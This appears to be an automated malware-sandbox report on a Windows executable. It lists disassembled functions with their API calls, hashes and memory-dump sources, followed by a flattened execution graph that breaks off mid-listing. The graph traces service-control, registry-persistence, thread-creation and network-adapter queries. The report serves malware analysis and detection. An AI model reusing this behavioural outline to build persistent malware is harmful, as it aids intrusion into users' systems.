                                                                                                                            • API ID: ExecuteMessageSendShell
                                                                                                                            • String ID: open
                                                                                                                            • API String ID: 812272486-2758837156
                                                                                                                            • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                                            • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                                                            • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                                            • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00455290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                                                            • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                                            • String ID: <
                                                                                                                            • API String ID: 893404051-4251816714
                                                                                                                            • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                                            • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                                                            • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                                            • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                            • String ID: )
                                                                                                                            • API String ID: 2227675388-1084416617
                                                                                                                            • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                                            • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                                            • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                                            • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00496B2E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window
                                                                                                                            • String ID: /INITPROCWND=$%x $@
                                                                                                                            • API String ID: 2353593579-4169826103
                                                                                                                            • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                                            • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                                                            • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                                            • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00447414 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                                                                            • API String ID: 3952431833-1023667238
                                                                                                                            • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                                            • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                                                            • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                                            • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004963A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                                                            • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                                                              • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                                                                            • String ID: 0nI
                                                                                                                            • API String ID: 3798668922-794067871
                                                                                                                            • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                                            • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                                                            • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                                            • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042DD64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$EnumQuery
                                                                                                                            • String ID: Inno Setup: No Icons
                                                                                                                            • API String ID: 1576479698-2016326496
                                                                                                                            • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                            • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                                                            • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                            • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00452E88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                            • String ID: T$H
                                                                                                                            • API String ID: 1799206407-488339322
                                                                                                                            • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                                            • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                                                            • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                                            • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00452E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                            • String ID: T$H
                                                                                                                            • API String ID: 377330604-488339322
                                                                                                                            • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                                            • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                                                            • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                                            • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00498004 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(74AE0000,00481A2F), ref: 0047D0E2
                                                                                                                              • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                                                              • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                                                            Strings
                                                                                                                            • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                                                                            • API String ID: 1717587489-3199836293
                                                                                                                            • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                                            • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                                                            • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                                            • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00455674 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1458359878-0
                                                                                                                            • Opcode ID: c5b77a215fef9e73284e25b888dd0379cf9cc52578839764909bbaa24cd021e3
                                                                                                                            • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                                                            • Opcode Fuzzy Hash: c5b77a215fef9e73284e25b888dd0379cf9cc52578839764909bbaa24cd021e3
                                                                                                                            • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:4%
                                                                                                                            Total number of Nodes:470
                                                                                                                            Total number of Limit Nodes:11
                                                                                                                            execution_graph 3666 4030c2 3667 4030c7 3666->3667 3670 40436c GetModuleHandleA 3667->3670 3669 4030cc 3671 40437b GetProcAddress 3670->3671 3672 40438b 3670->3672 3671->3672 3672->3669 3231 40d451 OpenSCManagerA 3595 404455 3596 404463 3595->3596 3597 40447e 3595->3597 3602 40610d 3596->3602 3605 40613a 3597->3605 3600 40446c 3601 404487 3608 406eb3 3602->3608 3604 406129 3604->3600 3606 406eb3 6 API calls 3605->3606 3607 406156 3606->3607 3607->3601 3610 406eee 3608->3610 3609 405c3b 6 API calls 3609->3610 3610->3609 3612 4071a3 3610->3612 3615 40719b 3610->3615 3611 405c3b 6 API calls 3611->3612 3612->3611 3614 4071ee 3612->3614 3613 405c3b 6 API calls 3613->3614 3614->3613 3614->3615 3615->3604 3706 402355 3707 4023b0 3706->3707 3708 402365 3706->3708 3708->3707 3709 402370 GetLastError SetServiceStatus SetEvent 3708->3709 3709->3707 3710 402157 3711 40215d 3710->3711 3712 402341 GetTickCount 3711->3712 3713 40d489 3712->3713 3731 406bd7 3732 406be6 3731->3732 3733 406c51 3732->3733 3734 406beb MultiByteToWideChar 3732->3734 3734->3733 3735 406c04 LCMapStringW 3734->3735 3735->3733 3736 406c1f 3735->3736 3737 406c25 3736->3737 3739 406c65 3736->3739 3737->3733 3738 406c33 LCMapStringW 3737->3738 3738->3733 3739->3733 3740 406c9d LCMapStringW 3739->3740 3740->3733 3741 406cb5 WideCharToMultiByte 3740->3741 3741->3733 3616 402658 3617 40dbee RegCreateKeyExA 3616->3617 3679 4022e0 VirtualAlloc 3680 40d8ac 3679->3680 3714 402562 3715 40d43e wsprintfA 3714->3715 3223 40d1e3 lstrcmpiW 3618 40d869 CommandLineToArgvW 3619 40da36 GetLocalTime 3618->3619 3620 401f27 27 API calls 3619->3620 3621 40da41 3620->3621 3621->3621 3681 4026e9 3682 40d248 StartServiceCtrlDispatcherA 3681->3682 3224 40226a RegQueryValueExA 3225 40d0ce 3224->3225 3622 40286e CreateThread 3623 40d73d 3622->3623 3624 40d46f CreateFileA 3625 40da4a CloseHandle ExitProcess 3624->3625 3684 40d2f3 WaitForSingleObject ExitProcess 3685 4028f4 RegSetValueExA RegCloseKey 3686 40d63e SetEvent 3685->3686 3687 4026f5 3688 40d295 GetProcAddress 3687->3688 3626 402277 3627 40d2dd Sleep 3626->3627 3628 40d9fd 3627->3628 3628->3628 3629 406a77 3630 406a7e 3629->3630 3631 406a86 MultiByteToWideChar 3630->3631 3632 406aaf 3630->3632 3631->3632 3633 406a9f GetStringTypeW 3631->3633 3633->3632 3550 40da78 3551 40da41 3550->3551 3552 40da37 3550->3552 3552->3551 3554 401f27 3552->3554 3555 401f3c 3554->3555 3558 401a1d 3555->3558 3557 401f45 3557->3551 3559 401a2c 3558->3559 3564 401a4f CreateFileA 3559->3564 3563 401a3e 3563->3557 3565 401a35 3564->3565 3569 401a7d 3564->3569 3572 401b4b LoadLibraryA 3565->3572 3566 401a98 DeviceIoControl 3566->3569 3568 401b3a FindCloseChangeNotification 3568->3565 3569->3566 3569->3568 3570 401b0e GetLastError 3569->3570 3581 402e56 3569->3581 3584 402e48 3569->3584 3570->3568 3570->3569 3573 401c21 3572->3573 3574 401b6e GetProcAddress 3572->3574 3573->3563 3575 401c18 FreeLibrary 3574->3575 3578 401b85 3574->3578 3575->3573 3576 401b95 GetAdaptersInfo 3576->3578 3577 402e56 7 API calls 3577->3578 3578->3576 3578->3577 3579 401c15 3578->3579 3580 402e48 12 API calls 3578->3580 3579->3575 3580->3578 3582 403251 7 API calls 3581->3582 3583 402e5f 3582->3583 3583->3569 3585 403022 12 API calls 3584->3585 3586 402e53 3585->3586 3586->3569 3587 40d578 RegCloseKey 3689 4062f8 3690 403208 7 API calls 3689->3690 3691 4062ff 3690->3691 3588 402a7c 3589 40dc31 CreateDirectoryA 3588->3589 3743 4031fd 3744 403208 3743->3744 3750 40480e 3743->3750 3746 403216 3744->3746 3747 405264 7 API calls 3744->3747 3748 40529d 7 API calls 3746->3748 3747->3746 3749 40321f 3748->3749 3751 40481f 3 API calls 3750->3751 3752 40481b 3751->3752 3752->3744 3221 402981 RegOpenKeyExA 3222 4029be 3221->3222 3692 402281 3693 40d60e wsprintfA 3692->3693 3694 40d7e7 3693->3694 3753 402181 3754 402183 Sleep 3753->3754 3756 402a2b 3754->3756 3757 405184 3760 40518c 3757->3760 3758 40521e 3760->3758 3761 405094 RtlUnwind 3760->3761 3762 4050ac 3761->3762 3762->3760 3695 40d086 3696 40d08e CloseServiceHandle 3695->3696 3698 406c8b 3699 406c99 3698->3699 3700 406c51 3699->3700 3701 406c9d LCMapStringW 3699->3701 3701->3700 3702 406cb5 WideCharToMultiByte 3701->3702 3702->3700 3763 40518c 3764 40521e 3763->3764 3766 4051aa 3763->3766 3765 405094 RtlUnwind 3765->3766 3766->3764 3766->3765 3227 40218d 3228 4026ef RegSetValueExA 3227->3228 3230 40dc54 RegCloseKey 3228->3230 3643 402211 3644 402216 3643->3644 3645 402898 GetModuleHandleA 3644->3645 3646 40d282 GetModuleFileNameA 3645->3646 3232 403112 GetVersion 3256 40344a HeapCreate 3232->3256 3234 403171 3235 403176 3234->3235 3236 40317e 3234->3236 3331 40322d 3235->3331 3268 404ee6 3236->3268 3240 403186 GetCommandLineA 3282 404db4 3240->3282 3244 4031a0 3314 404aae 3244->3314 3246 4031a5 3247 4031aa GetStartupInfoA 3246->3247 3327 404a56 3247->3327 3249 4031bc GetModuleHandleA 3251 4031e0 3249->3251 3337 4047fd 3251->3337 3255 4031fa 3257 4034a0 3256->3257 3258 40346a 3256->3258 3257->3234 3344 403302 3258->3344 3261 403486 3264 4034a3 3261->3264 3358 403cf8 3261->3358 3262 403479 3356 4034a7 HeapAlloc 3262->3356 3264->3234 3265 403483 3265->3264 3267 403494 HeapDestroy 3265->3267 3267->3257 3421 403010 3268->3421 3271 404f05 GetStartupInfoA 3279 405016 3271->3279 3281 404f51 3271->3281 3274 40507d SetHandleCount 3274->3240 3275 40503d GetStdHandle 3277 40504b GetFileType 3275->3277 3275->3279 3276 403010 12 API calls 3276->3281 3277->3279 3278 404fc2 3278->3279 3280 404fe4 GetFileType 3278->3280 3279->3274 3279->3275 3280->3278 3281->3276 3281->3278 3281->3279 3283 404e02 3282->3283 3284 